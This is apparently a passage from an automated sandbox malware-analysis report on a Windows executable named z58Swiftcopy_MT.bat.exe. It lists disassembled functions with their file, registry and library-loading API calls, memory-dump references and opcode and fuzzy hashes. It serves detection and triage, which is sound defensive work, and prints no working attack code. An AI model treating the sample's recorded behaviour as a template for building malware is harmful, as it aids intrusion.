                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53713371E00229DBDF28CF98C844BADBBB1FF44305F15846AE816BB280CB795996DF54
                                                                                                                                                                                                                                      Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                                                                                                                                                                                                                                      • Instruction ID: cefc1bbef9c73defef891fc114d0afe65c0266ceafdcaf147cd695a7a928f12c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1715671E00229DBDF28CF98C8447ADBBB1FF44305F15846AD816BB281CB795996DF44
                                                                                                                                                                                                                                      Function 00403146 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040315A
                                                                                                                                                                                                                                        • Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(000C46A1,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1092082344-0
                                                                                                                                                                                                                                      • Opcode ID: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                                                                                                                                                                                                                                      • Instruction ID: 532adb213c64d5ab3b143d976f528210e7f95c922d5c949e36f01b9cb200fd6d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD3160726442049FD710AF6AFE4896A3BECF75435A710827FE904B22F0DB389941DB9D
                                                                                                                                                                                                                                      Function 004024DF Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                                                                                                                                                                                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                                                                                                                      • Opcode ID: fe8fd4e513e4e616d4eb5e2fb0ddd0ee11b0ac4f4ac673c702b8733e8fb061e1
                                                                                                                                                                                                                                      • Instruction ID: 518a01c90e212b4e6c6a91e55dc37795372a660c14e02f5234546a481bba951e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8fd4e513e4e616d4eb5e2fb0ddd0ee11b0ac4f4ac673c702b8733e8fb061e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9901B171A04105AFE7159F69DE9CABF7ABCEF80348F10003EF405A61C0DAB84A419729
                                                                                                                                                                                                                                      Function 100027E4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumErrorLastWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 14984897-0
                                                                                                                                                                                                                                      • Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                                                                                                                                                                                                                      • Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55
                                                                                                                                                                                                                                      Function 0040303E Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                                                                                                                                                                                                      • Instruction ID: d45136b7277fa4a4eeb989eab338d16e1e03b20585a5145be81ea7fda6220a17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C314F31204259EFDB109F56DD44A9A7FA8EB08759F10803AF905FA190D378DA50DBA9
                                                                                                                                                                                                                                      Function 0040246D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                                                                      • Opcode ID: ad300b22dd5f7cf06ede3240ba929c96a40a23854c2b6697e9be571cd6d1636f
                                                                                                                                                                                                                                      • Instruction ID: 1b22629e75d9b419b9fa7e371b5212fc4da00fb077cffe61c988f7dc4f8aba71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad300b22dd5f7cf06ede3240ba929c96a40a23854c2b6697e9be571cd6d1636f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5511E771A05205EEDB15DF64DA8C5BE7BB4EF05348F20403FE446B72C0D6B88A42DB29
                                                                                                                                                                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                                                                                                                                                                                                      • Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C
                                                                                                                                                                                                                                      Function 00406431 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
                                                                                                                                                                                                                                        • Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                                      • Opcode ID: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                                                                                                                                                                                                      • Instruction ID: 56fda94a1dd54a43fb122a1991fe363568279dfba8e98efda579274c3b941564
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E086326042105AD2106BB09E0487773A89F84750302883EF946F2140D7389C75ABAE
                                                                                                                                                                                                                                      Function 00405C32 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                      • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                                                                                                                      • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                                                                                                                                                                                                      Function 00405703 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                                      • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                                                                                                                      • Instruction ID: 9e29868ffe2b43b7798ba1daada82999d34952ab2a4b7d437405be2737e00dc4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DC04C30225901DADA606F249F087177994FBA0741F1144396146E30E0EA348415ED2D
                                                                                                                                                                                                                                      Function 004025C4 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2111968516-0
                                                                                                                                                                                                                                      • Opcode ID: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
                                                                                                                                                                                                                                      • Instruction ID: 014ce3e67ccbc0a67955049e33e6e2fc18f0270869ac9b4e1a99f60d8e299e74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21F970D04295BEDF318B699948AAEBF749F11304F04457FE4D0B62D5C6BE8A82CF19
                                                                                                                                                                                                                                      Function 00402682 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
